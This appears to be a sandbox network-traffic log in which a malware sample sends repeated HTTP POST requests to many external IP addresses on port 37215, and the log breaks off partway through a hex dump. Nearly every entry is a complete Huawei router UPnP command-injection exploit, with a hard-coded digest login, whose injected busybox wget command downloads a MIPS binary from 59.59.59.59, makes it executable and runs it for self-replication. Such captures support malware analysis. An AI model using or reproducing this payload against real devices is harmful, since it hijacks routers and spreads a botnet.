                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2445192.168.2.155541841.96.187.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.406124115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2446192.168.2.1534334184.142.185.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.408498049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2447192.168.2.1560230157.243.89.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.414180994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2448192.168.2.1544098157.105.247.20637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.414253950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2449192.168.2.1552122157.247.185.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.414294004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2450192.168.2.1541286151.65.89.2037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.414562941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2451192.168.2.154132044.146.147.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.423427105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2452192.168.2.155849241.201.204.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.423783064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2453192.168.2.1546478157.232.27.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:34.409430981 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2454192.168.2.156088641.98.53.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:34.409451008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 